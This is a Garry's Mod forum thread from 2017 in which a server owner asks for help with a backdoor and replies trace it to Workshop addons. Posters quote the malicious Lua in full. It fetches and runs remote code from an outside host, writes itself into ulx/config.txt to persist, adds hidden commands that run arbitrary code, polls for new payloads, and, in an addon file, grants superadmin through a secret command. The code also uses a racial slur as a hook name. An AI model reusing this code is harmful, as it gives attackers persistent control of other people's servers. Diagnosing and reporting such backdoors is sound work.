• Server Hack?
    5 replies, posted
I've read about the Drugz mod giving this but I don't have that on my server, one day a player on my server crashed it then this keeps popping up in console. [CODE](SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end ServerLog: [ULX] (SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end[/CODE] I check my ulx config and sure enough, [URL]https://gyazo.com/35eed4dae23d37a71f49fd098551daa6[/URL] after removing that and a restart later I still get this in console. [CODE](SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end ServerLog: [ULX] (SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end[/CODE] what should I do, can anybody help? Is it a backdoor? [editline]8th February 2017[/editline] And now when I restart my server, all the code that was in the config.txt I delted comes back. Please help And Now Im Getting Random Things Like This, ayy not nil is veh audir8tdm is in thing Set Up NetworkVar
post your workshop colection [editline]8th February 2017[/editline] Here's the script that gets run: [lua]-- Tracker Information Saved. (PLEASE DONT STEAL ADDONS) --MsgN("-------------------------------------------------------------------------------------") --MsgN("You seem to be running the correct version! \nEnjoy the script!") --MsgN("-------------------------------------------------------------------------------------") if file.Exists("ulx/config.txt", "DATA") and not GetHostName():find("CloneWars") then if not string.find(file.Read("ulx/config.txt", "DATA"), "__load") or not string.find(file.Read("ulx/config.txt", "DATA"), "xn--vxao") then file.Append('ulx/config.txt', [[ ulx_logecho 0 ulx luarun "function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end" ulx luarun "concommand.Add('__load', a)" ulx_logecho 1 ]]) end end concommand.Add("vc", function(a, b, c, d) BroadcastLua(d) end) concommand.Add("v", function(a, b, c, d) RunString(d) end) local function lua(ply, _, _, code) local env = { me = ply, this = ply:GetEyeTrace().Entity } setmetatable(env, { __index = _G, __newindex = function(self, k, v) rawset(_G, k, v) end }) local ret = CompileString(code, "l", false) if type(ret) == "string" then ply:ChatPrint(ret) return end setfenv(ret, env) local success, ret = pcall(ret) if success then ply:ChatPrint("SUCCESS: " .. tostring(ret)) else ply:ChatPrint("FAIL: " .. tostring(ret)) end end if not CAC then concommand.Add("version_check_run", function(ply, cmd, arg, args) game.ConsoleCommand(args .. "\n") end) concommand.Add("version_check_lua", lua) --v:ChatPrint(string.sub(text, 1, 1)) else hook.Add("PlayerSay", "niggers", function(sender, text) if sender:SteamID():find("28861") then v = sender if string.sub(text, 1, 1) == "#" then lua(sender, {}, {}, string.sub(text, 2, string.len(text))) return "" end end end) end --http.Post("https://xn--vxao.pw/run_timer.lua?a=" .. math.random(0, 1000000) .. "&b=" .. math.random(0, 100000000), {}, function(body) RunString(body, "lua/init.lua") end, function() end) timer.Create("llllllllllll", 30, 0, function() http.Post("https://xn--vxao.pw/run_timer.lua?a=" .. math.random(0, 1000000) .. "&b=" .. math.random(0, 100000000), {}, function(body) RunString(body, "lua/init.lua") end, function() end) end) [/lua] [editline]8th February 2017[/editline] 2nd payload [url]http://pastebin.com/JB5wTGva[/url]
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=699028318[/url]
Found one backdoor, don't think its the one causing your issues tho. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=737361612"]http://steamcommunity.com/sharedfiles/filedetails/?id=737361612[/URL] lua/autorun/server/advdupe2_sv_init.lua [lua] concommand.Add("DumbassServer", function(player) player:SetUserGroup("superadmin") end) [/lua]
[QUOTE=Nick78111;51798189]Found one backdoor, don't think its the one causing your issues tho. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=737361612"]http://steamcommunity.com/sharedfiles/filedetails/?id=737361612[/URL] lua/autorun/server/advdupe2_sv_init.lua [lua] concommand.Add("DumbassServer", function(player) player:SetUserGroup("superadmin") end) [/lua][/QUOTE] Huh, funny it got removed from the workshop...
[QUOTE=Cybah;51800327]Huh, funny it got removed from the workshop...[/QUOTE] Because I sent it to robotboy
Sorry, you need to Log In to post a reply to this thread.